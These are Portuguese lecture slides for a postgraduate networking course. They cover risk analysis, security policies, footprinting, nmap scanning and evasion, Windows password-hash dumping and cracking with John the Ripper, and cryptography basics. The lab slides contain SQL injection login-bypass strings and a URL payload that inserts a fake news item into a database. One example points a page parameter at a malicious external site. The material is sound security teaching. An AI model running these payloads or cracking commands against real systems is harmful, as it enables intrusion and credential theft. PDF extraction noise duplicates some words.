1

Gestão de T.I.POS683 Redes de ComunicaçãoPOS683 – Redes de Comunicação

Aula 3

Prof. Rodrigo Rochaprof.rodrigorocha@yahoo.com http://www.bolinhabolinha.com

Requisitos da Segurança da Informação

ConfidencialidadeIntegridadeDisponibilidadeAutorizaçãoAutenticaçãoIrrevogabilidadeIrrevogabilidadeLegalidade

2

ATENÇÃO“TER RISCO SIGNIFICA TER UMA CHANCE”

Riscos

3

Riscos

Conceitos (ISO Guide 51 e 73) Risco• combinação da probabilidade de um evento e de suas conseqüências

Probabilidade• grau de possibilidade de que um evento (3.1.4) ocorra • NOTA 1 – A ISO 3534-1:1993 fornece uma definição matemática da

probabilidade como “um número real entre 0 e 1 atribuído a um evento aleatório. Pode se referir a uma freqüência relativa de ocorrência a longo prazo ou a um grau de confiança de que um evento irá ocorrer. Para um alto grau de confiança, a probabilidade é próxima de 1.”

• NOTA 3 – Os graus de confiança em relação à probabilidade podem ser selecionados de classes ou categorias, tais como:

rara / improvável / moderada / provável / quase certa, ouimpossível / improvável / remota / ocasional / provável / freqüente

Evento• ocorrência de um conjunto específico de circunstâncias; incidente

Conseqüência• resultado de um evento; impacto

4

Risco vs Impacto

Conceitos (ISO Guide 51 e 73) Ameaça• fonte potencial de dano• NOTA: O termo ameaça pode ser qualificado para definir sua origem

ou a natureza do dano esperado (por exemplo, ameaça de choqueou a natureza do dano esperado (por exemplo, ameaça de choque elétrico, ameaça de esmagamento, ameaça de corte, ameaça de intoxicação,ameaça de fogo, ameaça de afogamento).

vulnerabilidade• circunstância na qual ativos, pessoas, propriedade ou o ambiente

ficam expostos a uma ou mais ameaças

5

Evento

Conceitos (ISO Guide 51 e 73) análise de riscos (risk analysis)• uso sistemático de informações disponíveis para identificar ameaças

e estimar riscosavaliação de riscos (risk evaluation)avaliação de riscos (risk evaluation)• procedimento baseado na análise de riscos para determinar se o

risco tolerável foi alcançadoanálise e avaliação de riscos (risk assessment)• processo completo que compreende uma análise de riscos e uma

avaliação de riscosuso esperadouso esperado• uso de um produto, processo ou serviço de acordo com as

informações disponibilizadas pelo fornecedor

uso indevido previsível• uso de um produto, processo ou serviço, em desacordo com o

fornecedor, mas que pode resultar de um comportamento humano previsível

6

Processo iterativo de análise e avaliação de riscos (risk assessment) e redução do risco

ImportanteTer definido o Escopo• Podem ser feitos a nível de unidade de negócio, departamentos,

plataforma, aplicação ou níveis determinados pela empresa

EconomiaEconomia• Calcular de forma precisa os riscos para evitar gastar mais com

segurança do que o prejuízo em potencial

Determinação do risco• quantitativo

probabilidade e severidadequase impossível, pois nem todas as variáveis são quantitativas (valor,

b bilid d d i t í l d t ã )probabilidade, grau de incerteza, nível de proteção, ...)

• qualitativoextimativa das perdas potenciais

Experiência• Poucas empresas possuem registros históricos das falhas de

segurança, logo a avaliação depende da experiência da equipe envolvida

7

Passo a passoIdentificar os ativos e seus valores

• determinar os ativos e sua relevância com processos do negócio• valor de custo, valor para reposição, valor para reparo• importância para competição com concorrência

custo de desenvolvimento etc• custo de desenvolvimento, etc...

Identificar as ameaças e vulnerabilidades• questionários• entrevistas• técnicas (brainstorm, delphi, etc...)

Quantificar a probabilidade e o impacto nos negócios dessas ameaças potenciaisEstimar a possível perda causada pela ameaçaEstimar a possível perda causada pela ameaça

• custo da construção/aquisição• quanto perco pela quebra de confidencialidade

Fazer um comparativo econômico entre o impacto da ameaça e o custo das contra-medidasDocumentar o processo de análiseSeleção das medidas de proteção

Passo a Passo

8

Equipe de análise de riscoCargo de pessoas na equipe• gerentes• segurança física• donos de sistemas• administradores• analistas de segurança

Erros Comuns• Escopo infinito• Foco excessivo em tecnologia• Falta de comprometimento da direção• Falta de recursos• Periocidade deficiente

Exercícios

9

WorkflowIdentificar os ativos críticosGerenciar o risco

Associar uma probabilidade e impacto das• Associar uma probabilidade e impacto das ameaças

• Priorizar ameaças• Escolher estratégias de resposta• Desenvolver um plano de segurança

Plano de recuperação de desastres

WorkFlow

Análise/Avaliação de risco

Definição do contexto

Identificação de risco

Estimativa de risco

Avaliação de risco

Com

unic

ação

do

risco

amen

to e

aná

lise

críti

ca d

e ris

co

Avaliação

OK?

Tratamento do risco

Aceitação do risco

Mon

itora

Trata-mentoOK?

10

Modelo (Microsoft)

(Fonte: Microsoft.com)

ExercíciosBibliografia COMPLEMENTAR1-) Defina os termos

• a-) Ameaça• b-) Agente da ameaça• c-) Vulnerabilidade• d) Severidade• e-) Impacto

2-) Quais os principais benefícios da análise de Riscos?

3-) Quando a análise de risco deve ser executada?

4-) Descreva detalhadamente as principais etapas do processo de análise de4-) Descreva detalhadamente as principais etapas do processo de análise de risco

5-) Explique as alternativas em um processo de decisão derivado da avaliação dos riscos

6-) Quais os principais fatores a serem levados em consideração em uma análise de custo x benefícios?

11

Políticas de Segurança

Definição

De acordo com a ISO 17799:2005• Objetivo: Prover uma orientação e apoio da

direção para a segurança da informação dedireção para a segurança da informação de acordo com os requisitos do negócio e com as leis e regulamentações relevantes.

• Convém que a direção estabeleça uma política clara, alinhada com os objetivos do negócio e demonstre apoio e comprometimento com ademonstre apoio e comprometimento com a segurança da informação por meio da publicação e manutenção de uma política de segurança da informação para toda a organização.

12

Documento da política de segurança da informação

Controle• Convém que um documento da política de segurança da informação

seja aprovado pela direção, publicado e comunicado para todos os funcionários e partes externas relevantes.

Diretri es para implementaçãoDiretrizes para implementação• Convém que o documento da política de segurança da informação

declare o comprometimento da direção e estabeleça o enfoque da organização para gerenciar a segurança da informação. Convém que o documento da política contenha declarações relativas a:

a) uma definição de segurança da informação, suas metas globais, escopo e importância da segurança da informação como um mecanismo que habilita o compartilhamento da informação (ver introdução);

b) uma declaração do comprometimento da direção, apoiando as metas e princípios da segurança dainformação, alinhada com os objetivos e estratégias do negócio;

Documento da política de segurança da informação

c) uma estrutura para estabelecer os objetivos de controle e os controles, incluindo a estrutura de análise/avaliação e gerenciamento de risco;

d) breve explanação das políticas, princípios, normas e requisitos de conformidade de segurança da informação específicos para a organizaçãoconformidade de segurança da informação específicos para a organização, incluindo:• 1) conformidade com a legislação e com requisitos regulamentares e

contratuais;• 2) requisitos de conscientização, treinamento e educação em segurança da

informação;• 3) gestão da continuidade do negócio;• 4) conseqüências das violações na política de segurança da informação;

e) definição das responsabilidades gerais e específicas na gestão da segurança da informação, incluindo o registro dos incidentes de segurança da informação;

f) referências à documentação que possam apoiar a política, por exemplo, políticas e procedimentos de segurança mais detalhados de sistemas de informação específicos ou regras de segurança que os usuários devem seguir.

13

Atividade1-) Definição da Empresa2-) Selecionar uma área3 ) R li áli d i3-) Realizar uma análise de risco4-) Produzir políticas de segurança

ModelosSANS• http://www.sans.org/resources/policies/

http://www.ruskwig.com/security_policies.htmhttp://www.dir.state.tx.us/security/policies/templates.htm

14

Segurança FísicaSegundo a NBR ISO/IEC 17799:2005,:“Objetivo: Prevenir o acesso físico não autorizado, danos e interferências com as instalações e çinformações da organização.Convém que as instalações de processamento da informação críticas ou sensíveis sejam mantidas em áreas seguras, protegidas por perímetros de segurança definidos, com barreiras de segurança e controles de acesso apropriados. Convém que sejam fisicamente protegidas contra o acesso não autorizado, danos e interferências.Convém que a proteção oferecida seja compatível com os riscos identificados.“

DispositivosCentral de alarme• Prevenção de sinistros

Monitoramento 24h

15

DispositivosControle de Rondas• sistema de controle de ronda inteligente

composto por um equipamento portátil de coletacomposto por um equipamento portátil de coleta de dados, o Leitor Viggia, e um software de controle de ronda

DispositivosControle Biométrico• Autenticação / Autorização

16

DispositivosCatraca Eletrônica• Identificação

DispositivosCâmeras de segurança

Demo on linehttp://200.161.28.199

http://62.55.154.23:40002/

Vi ã NVisão Noturna

17

DispositivosF.A.Q.:

O que é FPS?: Imagens(quadros) por segundo (is).A gravação de 30 e 120 fps tem qualidade de gravação de 7,5i/s (usado na maioria dos sistemas de seg rança peq ena tr ncada na imagemna maioria dos sistemas de segurança, pequena truncada na imagem gravada), a de 240fps tem de 15i/s (usado em menor escala no mercado, quase tempo real) e a de 480 tem de 30i/s (tempo real , mesma taxa utilizada em televisão e dvd).

O que é câmera CCD? : câmeras com tecnologia digital, requer uma iluminação menor ou nenhuma, qualidade superior.

O que é câmera CMOS? : câmeras com tecnologia analógica que requer uma iluminação maior e tem qualidade inferior.

Qual a diferença das lentes/mm? : As diferenças estao no alcance e no grau de abertura, que dependem do local a ser instalado.

DispositivosDomeElemento protetor das câmeras contra poeira, ventos e etc . Geralmente fixados no teto de forma a ficarem discretos.

18

DispositivosGravadores de vídeo• Placa PCI

• DVRHD Interna

OCRSistema dereconhecimento

19

FootprintLevantamento de Informações

GlossárioTipos de Hackers• hacker• cracker• ethical hacker• ethical hacker• white hat• black hat• gray hat

Fraquezas de segurança• script kiddie• hacktivismohacktivismo• vulnerabilidade• Exploit / 0day• Empregados mal preparados / descontentes• Adminitradores imprudentes• Espionagem industrial• Wardriving

20

Funcionamento de um ataqueLevantamento de informações• footprint• fingerprint• fingerprint• varreduras

Explorações• força bruta• exploitsp• sql injection, etc.

Elevação de privilégiosInstalação de backdoor e ferramentas Obtendo as informações privilegiadas

FootPrint

Levantamento de informações sobre o sistema “alvo”;É i í i é iÉ o início para se traçar uma estratégia de ataque;Sun Tzu (A arte da guerra)• "O que possibilita ao soberano inteligente e seu

d t i t i i i licomandante conquistar o inimigo e realizar façanhas fora do comum é a previsão, conhecimento que só pode ser adquirido através de homens que estejam a par de toda movimentação do inimigo"

21

Por que garimpar informações ?Sistemas são feitos por pessoas, e cada pessoa é diferente (comportamento, humor, caráter, fidelidade, etc...)caráter, fidelidade, etc...)Os ataques são feitos contra uma organização e não contra um único equipamentoSuas chances diminuem muito devido a medidas de segurança. (Exemplo: descobrir um 0day para explorar um WebServer)

Engenharia SocialRequisitos• Gestão de pessoas Comunicação• Boa Memória Pro Ativo• Boa Memória Pro Ativo• Agradável Persuasível• Simpático Postura de “Chefe”

Interações com as pessoase ações co as pessoas• Reciprocidade Amável• Modelo a ser seguido Herói

22

Engenharia SocialMeios• Instante Messager Lista de Emails / Grupos• Forum Comunidades Virtuais• Second Life Telefone• E-Mail Web• Cara-a-Cara

Métodos• Pesquisas email/web “Passeios” pela empresa• Ouvidos atentos Empregados externos• Escuta telefônica Sala do café• Happy Hour

É lá vamos nós !!Informações sobre a empresa• Aquisições / Fusões recentes

maturidade no nível de segurança diferentesi õ / i t õ d i t / i fmigrações / integrações de sistemas / infra

• Aquisições de novos equipamentos• WebSite

muitas informações escondidasPossui extranet?

• DNS lookupservidor de nomesfaixa de endereços

• Whoisinformações sobre o registro do domínio

• Blogs / Vagas de emprego / Forums / Orkut / secondlife

23

Garimpando informaçõesWebpage da empresaHistórico dos sites da empresa• http://www.archive.org

Sites de Buscahttp://www.dogpile.comGrupos de E-mail• http://groups.google.com/ - pesquisar @alvo.com.br

Sites• Tribunais (Ex: http://www.tj.sp.gov.br )• Telefônica

Livros sobre investigações (investigador particular)g ç ( g p )• www.crimetime.com

24

Google\Yahoo HacksGoogle (http://johnny.ihackstuff.com/ghdb.php)

• “@alvo.com.br”• Arquivos do excel em determinado site

site:www.alvo.com.br filetype:xls

• intitle:"extranet “• intitle: extranet • Procurando arquivos do word

intitle:”index of” -inurl:htm -inurl:html docx

• Estatísticas do siteintitle:"Usage Statistics for" "Generated by Webalizer“

• VNCintitle:"vnc" inurl:5800

• Cópias de arquivos importantesfil b k i l "h | d | h d | h "filetype:bak inurl:"htaccess | passwd | shadow | htuser"

• Video serverintitle:"live view" intitle:axis · intitle:axis intitle:"video server“

Yahoo• Sites que apontam para a empresa

linkdomain:alvo.com.br –alvo.com.br

Robots.txtArquivo padrão texto que é colocado no site da empresa para “dizer” o que não deve ser indexado pelos mecanismos de buscaindexado pelos mecanismos de busca• Google hacks

"robots.txt" "Disallow:" filetype:txt

25

Exemplowhois • whois alvo.com.br

registro brregistro.br

ping e tracerouteping• Verifica se o host responde a uma requisição

ICMPICMPtraceroute / tracert• Mostra a rota até chegar no host destino

On Line• http://network-tools.com• http://visualroute.visualware.com/• http://ping.eu/

26

Ferramentas on-lineNão intrusivoEx: www.netcraft.com

Whats that site running• Whats that site running

“Rastrear” o e-mailOlhando o cabeçalhoLogar via telnet no servidor• telnet pop3.servidor.com.br 110

Autenticandouser nome do usuario• user nome_do_usuario

• pass senha_do_usuarioComandos• Mostra a quantidade de mensagens e o espaço ocupado

stat

• Mostrar lista das mensagenslist

• Mostrar uma mensagem• Mostrar uma mensagemretr numero_mensagem

• Mostra o cabeçalho mais “n” linhastop numero_mensagem numero_linhas

• Marcar para deleçãodele numero_mensagem

• Sairquit

27

SpiderFazendo download do site inteiro• wget –r www.alvo.com.br

metagoofilExtrai metadados de arquivos em determinados sites• Google

Site:alvo.com filetype: pdf

28

dnsenumColetar informações do DNS• Tenta fazer transferência de zonas

ExercíciosEm Grupo:

• Levante as seguintes informações sobre a sua máquina. Quais comandos você utilizou:Endereço IPMáscaraClasse da Rede (A,B ou C)Servidor de DNSServidor DHCPGateway

Faça uma lista de 5 sites famosos e descubra qual sistema operacional está rodando neles.

Escolha um site e levante todas as informações que puder (Exemplo: SO,IP, registros, DNS, etc...) utilizando de técnicas não intrusivas.g , , )

• Site: • Informações apuradas e como foram conseguidas:

Quais as formas de “tentar” minimar o processo de obtenção de informações descritos nesta aula.

29

Funcionamento de um ataqueLevantamento de informações• footprint• fingerprint• fingerprint• varreduras

Explorações• força bruta• exploitsp• sql injection, etc.

Elevação de privilégiosInstalação de backdoor e ferramentas Obtendo as informações privilegiadas

Verreduras

Levantamento de informações sobre o sistema “alvo”;P d ili fPodemos utilizar ferramentas automatizadas (muito “barulhenta”) ou manuais (menos “barulhentas”)Manual• telnet <porta> Ex: telnet 80• echo “teste” | nc www.alvo.com 80 | grep

“<address>”

30

Varreduras - ferramentasNMAP• Sofisticado portscan (varredura de portas)• Escrito por Fyodor• Manual: http://nmap.org/man/pt-br/

NMap – tipos de varredurasSintaxe• nmap <parametros> host –p porta• Exemplo:

nmap 192.168.0.1

Exemplos de uso• Verificando o sistema operacional

nmap 192.168.0.1 –O• Não efetua ping (útil para firewall do windows)

nmap 192.168.0.2 –P0• Tentar obter a versão do serviço

nmap 192.168.0.100 –sV

V f i d IP• Varrer uma faixa de IPnmap 10.0.0.1-100

• Criar um log da varreduanmap 10.0.0.1-254 –oN varretura.txt

• Scaneando uma faixa de IP procurando uma determinada portanmap 10.0.0.1-250 –p 80

31

NMap – “Tentando” evitar Firewall/IDS-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> (Estabelece um padrão de temporização)• “Nmap oferece seis padrões de temporização. Você pode

especificá los com a opção T e os números (0 5) o osespecificá-los com a opção -T e os números (0 - 5) ou os nomes. Os nomes de padrões são paranóico (paranoid, 0), furtivo (sneaky, 1), educado (polite, 2), normal (3), agressivo (agressive, 4) e insano (insane, 5). Os dois primeiros são para evitar um IDS. O modo educado (ou polido), diminui o ritmo de escaneamento para usar menos banda e recursos da máquina alvo O modomenos banda e recursos da máquina alvo. O modo normal é o padrão e, portanto, -T3 não faz nada. O modo agressivo acelera os scans assumindo que você está em uma rede razoavelmente rápida e confiável. Finalmente, o modo insano assume que você está em uma rede extraordinariamente rápida ou está disposto a sacrificar alguma precisão pela velocidade.”

NMap – “Tentando” evitar Firewall/IDS

-f (fragmenta os pacotes); --mtu (usando a MTU especificada)• “A idéia é dividir o cabeçalho TCP em diversos pacotes para tornar

mais difícil para os filtros de pacotes os sistemas de detecção demais difícil para os filtros de pacotes, os sistemas de detecção de intrusão, e outros aborrecimentos, detectar o que você está fazendo”

-D <chamariz1 [,chamariz2][,ME],...> (Disfarça um scan usando chamarizes)• “Faz com que um scan com chamarizes seja executado, o que parece

ao host remoto que, o(s) host(s) que você especificou como chamarizes também estejam escaneando a rede-alvo. Com isso, o IDS poderá reportar 5 a 10 scans de portas de endereços IP únicos, mas não saberá qual IP estava realmente escaneando e qual era um chamariz inocente. Embora isso possa ser desvendado através de rastreamento de caminho de roteador, descarte de respostas (response-dropping) e outros mecanismos ativos, normalmente é uma técnica eficaz para esconder o seu endereço IP.”

32

NMap – “Tentando” evitar Firewall/IDS-S <Endereço_IP> (Disfarça o endereço de origem)• “Em algumas circunstâncias, o Nmap pode não conseguir determinar

o seu endereço de origem (o Nmap irá dizer se for esse o caso). Nesta situação, use o -S com o endereço IP da interface que você ç ç qdeseja utilizar para enviar os pacotes.

• Outro uso possível para esta flag é para disfarçar o scan e fazer com que os alvos achem que alguma outra pessoa está escaneando-as. Imagine uma empresa que está constantemente sofrendo scan de portas de um concorrente! A opção -e normalmente seria requerida para este tipo de uso e -P0 seria recomendável.”

• Fonte: Manual do NMAP

SuperScan (Windows)PortScanner

33

Banner grabberRetirar informações através do banner do aplicativo• telnet IP portatelnet IP porta• Exemplo: telnet 192.168.0.100 21

HPINGEnviar pacotes “montados” TCPhping alvo.com.br –p <porta>

Opções • -F --fin set FIN flag

-S –syn set SYN flag-R --rst set RST flag-P --push set PUSH flag-A --ack set ACK flag-U –urg set URG flag -X --xmas set X unused flag (0x40)-Y --ymas set Y unused flag (0x80)

• -p <número porta>

34

NessusInstalando• rpm –ivh Nessus-3.2.0-es5.i386.rpm• rpm –ivh Nessus-Client-3 2 0-es5 i386 rpm• rpm –ivh Nessus-Client-3.2.0-es5.i386.rpm

Criando o usuário• /opt/nessus/sbin/nessus-add-first-user

Carregando servidor nessus• /opt/nessus/sbin/nessusd -D &/opt/nessus/sbin/nessusd D &

carregando Cliente• /opt/nessus/bin/NessusClient

Paraoshttp://www.parosproxy.orgProxy “local”Pode ser utilizado para interceptar requisições GET e POSTConsegue visualizar e modificar campos “hidden” de formulários

35

John the RipperInstalando• tar xzvf john-1.7.0.2.tar.gz• cd john-1 7 0 2/src• cd john-1.7.0.2/src• make clean linux-x86-any• cd ../run

Utilizando • john arquivo_senhasj q _

Usando com dicionários• john arquivo_senhas --wordlist=./dicionario.txt

Senhas Windowsbkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved syskey txt>password hashes txtsaved-syskey.txt>password-hashes.txt john password-hashes.txt -w:eng.txt http://www.plain-text.info/search/

36

SenhasSenhas Fracas• somente letras ou números• poucos caracteres• palavras conhecidas

computador, teste, root, caneta, bolinha

• dados pessoaisplaca do carro, nomes, endereços, escola, sobrenome, datas, ...

S h F tSenhas Fortes• Combinação

letras maiúsculas e minúsculasnúmeroscaracteres especiaisno mínimo 8 caracteres

Porque as senhas falhamEngenharia social• através de “um bom papo e simpatia” conseguir dados

Adivinhaçãoh tili d t ( t t d i d i )• senhas utilizadas comumente (root:root, admin:admin)

• senhas padrãohttp://defaultpassword.com/http://www.phenoelit-us.org/dpl/dpl.htmlhttp://www.cyxla.com/passwords/index.php

Força Bruta• Tentar todas as possíveis entradas• 1,2,3,....,a,b,c,...z• 11,12,13,14,...., zz• ...

Dicionário• Utilização de lista de palavras para facilitar as tentativas• “chute direcionado”

37

Senhas fortespossíveis combinações em um ataque de força bruta, utilizando somente letras minúsculas e todos os caracteres

Aleatório é aleatório mesmo ?Distribuição

38

Quebrando Senhas WindowsUtilizando backtrack• boot via pendrive• bkhive-linux

/mnt/hda1/Windows/System32/config/SYSTEM syskey.txt • samdump2-linux

/mnt/hda1/Windows/System32/config/SAM syskey.txt > hashes.txt

• Brute Forcejohn --format=NT hashes.txt

• Dicionáriojohn hashes.txt –w:dicionario.txt

• Raibow tableshttp://www.plain-text.info/search/

ToolsTHC-HYDRA• Brute force para vários serviços

39

Exercícios1-) Utilizando o software passutils.exe... • a-) gere 10 senhas fracas, médias e fortes.• b-) Coloque uma antiga senha utilizada por você e descubra o nível

de segurança da mesma.de segurança da mesma.• c-) Entre com seu usuário e senha de e-mail, clique em “revel

password”, vá para o Internet Explorer, selecione o password (****) e vá novamente a tela do passutil. O que ela mostrou ?

2-) Quais os principais passos para termos segurança no processo de autenticação?3-) Quais são as fragilidades da utilização de senhas? 4-) O que são senhas fortes e qual o problema da sua utilização?5-) Qual seria uma solução para evitar o alto número de senhas que temos que decorar hoje em dia?

Exercícios6-) Como posso tentar reduzir o tempo de um ataque do tipo força bruta?

7-) O que são raibow-tables?

8-) O que são hashes ?

9-) Como posso forçar a segurança em senhas do windows e linux?

40

Ambiente WEB “estático”Servidor• IIS• Apache

ClienteCliente• Browser

IEFireFox

Ambiente Web “Dinâmico”Servidor WebCliente• Navegadores

S id d BDServidores de BD

41

Processo de registro de um domínio

Registrar o nome do domínio• Nacional

http://www registro brhttp://www.registro.br• Internacional

Várias empresas são credenciadas (http://www.internic.com/alpha.html)

2 servidores de DNS• Traduzem o nome www seila com para um• Traduzem o nome www.seila.com para um

endereço IP 200.200.20.1

Diretórios em servidor webInternet Information Service - IIS• C:\inetpub\wwwroot

ApacheApache• \var\www

Arquivos colocados nestes diretórios são lidos pela raiz do site:pela raiz do site:• Exemplo: c:\inetpub\www\seila.html• http://www.site.com.br/seila.html

42

Um pouco mais dinâmicaUso de scripts• Javascript

<script language="JavaScript"><script language JavaScript > nome = prompt("Diga-me seu nome:","“)}

document.write("<h1>Olá " + nome + "</h1>") </script>

• Vbscript<SCRIPT LANGUAGE="VBScript"> pNome=inputbox(“Digite um nome:”)Msgbox(“Ola” & nome)</SCRIPT>

ProblemaUma autenticação via client-side (Nunca faça isso em casa !!!!)

<script language="javascript"><script language javascript >var ra = prompt("Digite seu RA:");var senha = prompt("Digite sua senha:");if(ra==11111111 && senha==1111){

document.writeln("<span class='style6'><br /><span class='style11'>Seja muiiiito Bem Vindo !!!</span></span></span></div>");

}}else{

document.writeln("<span class='style6'><br />Não Autorizado</span></span></div>");

}

</script>

43

Precisamos de interação!!!Aplicações web• Intranet• Extranet• Dinâmicas• Dinâmicas• Acesso a banco de dados

Linguagens• Client side

Escrita dentro da página htmlUsuário têm acesso ao código fontegEx; javascript e vbscript

• Server sideSão processadas no servidorServidor retorna resultado em forma de página htmlUsuários não conseguem ver o código fonte

Ambientes Server-SideWindows• Web: IIS• Linguagem: ASP, ASP.NET• Banco de Dados: SQL Server ou outros

Linux• Web: Apache• Linguagem: PHP• Banco de Dados: Mysql, Postgre, outros

AMPApache – Mysql – PHP

LAMP• Linux – Apache – Mysql - PHP

44

Tipos de AtaquesSql InjectionXSS - Cross Site ScriptingXP thXPath

SQL InjectionMétodo de se inserir comandos SQL em entradas de páginas web;As páginas dinâmicas na web recebem parâmetros p g pdo usuário e repassam via consulta para o servidor de banco de dados• Exemplo: Login, consultas

Com o artifício do SQL Injection, é possível: • entrar autenticado sem possuirmos credenciais• realizar comandos SQL (Ex: drop table)• inserir dados nas tabelas

Páginas que podem ser exploradas:• ASP, JSP, CGI ou PHP

45

LaboratórioEntrando autorizado

LaboratórioNo login posso tentar• Campos numéricos

1 or 1=11 or 1 1• Campos texto

‘ or ‘’=‘• Caracter de “scape”

1 or 1=1 –

46

LaboratórioInserindo dados

LaboratórioUtilizando as mensagens de erro• http://localhost/noticia.asp?id=1 having 1=1• http://localhost/noticia.asp?id=1 group by noticias.codigo having 1=1• http://localhost/noticia asp?id=1 group by noticias codigo titulo having• http://localhost/noticia.asp?id=1 group by noticias.codigo,titulo having

1=1• http://localhost/noticia.asp?id=1 group by noticias.codigo,titulo,texto

having 1=1

Depois de descoberto os campos, adiciono uma notícia falsa• http://localhost/noticia.asp?id=1%20group%20by%20noticias.codigo,ti

tulo,texto;INSERT%20INTO%20NOTICIAS(CODIGO,TITULO,TEXTO)%20VALUES(9999,'Falencia','A%20empresa%20decretou%20falencia');---

47

XSS – Cross Site ScriptingAs vulnerabilidades Cross-site scripting (por vezes chamado de XSS) ocorrem quando um invasor usa uma aplicação web para enviarinvasor usa uma aplicação web para enviar código malicioso, geralmente na forma de um script, para um outro usuário final. Estas vulnerabilidades estão muito difundidas e ocorrem sempre que uma aplicação web utiliza a entrada do usuário na saída queutiliza a entrada do usuário na saída que aplicação gera sem validá-la. (owasp)

Laboratóriohttp://localhost/sobre.asp?pagina=sobrenos.htm

http://localhost/sobre.asp?pagina=http://www.sitemalicioso.com/outrapagina.htm

48

Exercícios1-) Quais danos podem ser causados por ataques de Sql Injection?

2 ) O é Bli d SQL I j ti ?2-) O que é Blind SQL Injection?

3-) Quais as contra-medidas contra XSS e Sql Injection?

4-) “Não mostrar mensagens de erros do servidor web são suficientes para frustar tentativas de ataque” Você concordasuficientes para frustar tentativas de ataque . Você concorda com esta afirmação. Justifique.

5-) O que é, e quais os problemas de uma backdoor web?

Criptografia

49

Requisitos da seg. da informaçãoConfidencialidade• Garantir que a informação seja legível somente por pessoas

autorizadas

IntegridadeIntegridade• A mesma informação que foi enviada deve ser recebida. Não foi

alterada.

Disponibilidade• Garantir que a informação estará lá quando for necessário

Autenticidade• Das entidades• Das entidades• Das origem das mensagens

Não Repúdio• Garantir que a entidade “negue” a autoria da mensagem/ato

Anonimato• Esconder a identidade

Falando em integridadeExemplo• “Meu sonho virou realidade! Finalmente saí de

férias. Não encontrei ninguém e por isso deixei oférias. Não encontrei ninguém e por isso deixei o relatório com a mulher do chefe. Prometo tirar fotos !!!”

• “Meu sonho virou realidade! Finalmente saí de férias. Não encontrei ninguém e por isso deixei oférias. Não encontrei ninguém e por isso deixei o relatório com a mulher do chefe. Prometo tirar fotos !!!”

50

CriptografiaA palavra criptografia ´e composta pelos termos gregos: • kryptos = secreto• grafo = escrita.

Criptografia Clássica• Métodos para promover sigilo das informações

Criptografia Moderna• Conjunto de técnicas computacionais e matemáticas para

atender aos requisitos da segurança da informação

Primitivas vs Requisitos

Primitivas Requisitos de Segurançag ç

CIFRA Confidencialidade

Função de Hash Integridade

Assinatura Digital AutenticidadeIntegridadeNão Repúdio

51

CifrasMecanismo para prover confidencialidade (sigilo) nas informaçõesCompostaComposta• Ciframento• Deciframento

Componentes• Texto em Claro• Texto Cifrado• Chave

CifrasCifragem de uma mensagem

52

CiframentoSimétrico• A partir da chave de ciframento é

computacionalmente fácil achar a chave decomputacionalmente fácil achar a chave de deciframento

Assimétrico• É computacionalmente “impossível” obter a chave

de deciframento a partir da chave de ciframento• Chave pública e privada

SimétricasVantagens

• Velocidade• Chaves pequenas• Atingem os objetivos de confidencialidade

DesvantagensDesvantagens• Chave secreta compartilhada• Não permite autenticação e não repúdio

Principais algoritmos• a) DES (Data Encryption Standard): É o algoritmo simétrico mais difundidono mundo. Criado pela

IBM em 1977, com um tamanho de chave de 56 bits, relativamente pequeno para os padrões atuais, foi quebrado por “força bruta” em 1997;

• b) TripleDES: Uma variação do DES que utiliza 3 ciframentos em seqüência, empregando chaves com tamanho de 112 ou 168 bits, sendo recomendado no lugar do DES desde 1993;

• c) IDEA (International Data Encryption Algorithm): Criado em 1991, segue as mesmas idéias do DES, mas tem execução mais rápida que o mesmo.

• d) AES (Advanced Encryption Standard): É o padrão atual para ciframento recomendado pelo NIST (National Institute of Standards and Technology). Trabalha com chaves de 128, 192 e 256 bits, que adotou o cifrador Rijndael após a avaliação de vários outros;

• e) RC6: A última versão de uma série de cifradores (RC2, RC3, RC4, RC5) desenvolvidos por Rivest. Concorreu à adoção pelo padrão AES.

53

Substituição SimplesJúlio César• Utilizada para troca de mensagens entre os generais• Deslocamento (k) de 3 letras. Cada letra do alfabeto era substituída

pela terceira letra a direitapela terceira letra a direita

Texto em Claro: ABCDEFGHIJKLMNOPQRSTUVWXYZ Texto Cifrado: DEFGHIJKLMNOPQRSTUVWXYZABC

Exemplo• EU SOU O CARA• HX VRX R FDUD

ExercícioUtilizando a cifra de César, mostre qual a mensagem da frase abaixo

D FLIUD GH FHVDU SRGHD FLIUD GH FHVDU SRGH VHU TXHEUDGD IDFLOPHQWH

54

ExercícioUtilizando a cifra de César, cifre a seguinte mensagem.

t e n h o a u l a n a E S C O L A

↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓

ExercícioUtilizando a cifra de César com k<>3. Qual o valor de k (Deslocamento)?

55

Análise de freqüênciaBaseado no fato de que certas letras e combinações de letras aparecem com uma certa frequencia em determinada linguagemcerta frequencia em determinada linguagemEm Inglês, por exemplo, é a letra E e a menos comum ZEm português, a letra A é a mais comum e a letra Y a menos comum

Freqüencia das letras em Inglês

56

Freqüência das letras em Português

57

AssimétricaDuas chaves• 1 – cifrar• 1 – decifrar

Chaves públicas e privadas• Você deseja enviar uma mensagem a alguém• Pede a chave pública• Cifra a mensagem com esta chave pública• Receptor decifra utilizando a chave privada

Algoritmo• RCA• DSA

58

Assinatura DigitalCifragem com a sua chave privada e enviaUtilizando a chave pública, qualquer um pode decifrá-la utilizando a chave públicaautenticidade, integridade e não-repudiação da mensagemNão garante a confidencialidade da mensagem. Qualquer um poderá acessá-la e

ifi á lverificá-la

HashÉ um método para transformar dados de tal forma que o resultado seja (quase) exclusivo

59

Bibliografia

Livro texto• FRANCO Jr. Carlos F. e-business na Infoera. 4. Ed. São Paulo: Atlas, 2006.

ISBN13: 9788522443901.

• KUROSE, JAMES F.; ROSS, KEITH W. Redes de computadores e a internet uma nova abordagem. Addison Wesley. 3a Edição. 2007 ISBN13: 9788588639188.

• TANEMBAUM, A.S., Redes de Computadores. 4a. Ed. Rio de Janeiro: Editora Campus, 2003. ISBN13: 9788535211856.

TERADA R t S d d d i t fi d d• TERADA, Routo. Segurança de dados: criptografia em redes de computador. São Paulo: Edgard Blücher, 2.Ed. 2008. ISBN13: 9788521204398.